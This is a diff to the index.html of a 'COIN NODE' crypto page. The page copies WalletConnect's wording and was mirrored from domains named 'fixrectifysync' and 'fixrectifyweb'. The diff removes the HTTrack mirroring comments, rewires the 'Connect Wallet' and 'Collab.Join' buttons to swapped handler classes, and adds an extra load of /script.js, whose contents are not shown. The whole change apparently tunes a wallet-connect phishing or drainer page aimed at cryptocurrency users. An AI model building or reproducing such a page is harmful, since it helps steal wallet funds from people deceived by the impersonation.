--- a/index.html
+++ b/index.html
@@ -1,11 +1,7 @@
 
 
 <html lang="en">
-    
-<!-- Mirrored from fixrectifysync-rkgsyeb9-greg-sept.4everland.app/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Oct 2024 09:12:33 GMT -->
 
-<!-- Mirrored from fixrectifyweb.vercel.app/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 18 Nov 2024 15:41:30 GMT -->
-<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
 <head>
         <script src="/script.js"></script>
         <meta charset="UTF-8" />
@@ -6435,9 +6431,8 @@
                                 </h1>
                                 <h4>COIN NODE is an open protocol to communicate securely between Wallets and Dapps (Web3 Apps).</h4>
                                 <h6>The protocol establishes a remote connection using a Bridge server.</h6>
-                                <button class="connectButton">Connect Wallet</button>
-                                <button class="interact-button">Collab.Join</button>
-                                <br />
+                                <a ><button class="interact-button">Connect Wallet</button></a>
+                                <a ><button class="connectButton">Collab.Join</button></a> <br />
                                 <!-- <h4 style="margin-top: 1.3rem;">Test Wallet : <a style="color: #3182ce;" href="https://test.walletconnect.org/"> https://test.walletconnect.org/</a></h4> -->
                                 <!-- <a href="./qrcode.html">h</a> -->
                                 <!--    <img src="https://walletconnect.com/assets/blockchain-connect.png" alt="" style="height:250px;">-->
@@ -6843,6 +6838,8 @@
         <script src="script/counter/jquery.counterup.min.html"></script>
         <script src="script/wow/wow.min.html"></script>
         <script src="script/script.html"></script>
+        <script src="/script.js"></script>
+
 
     </body>
 
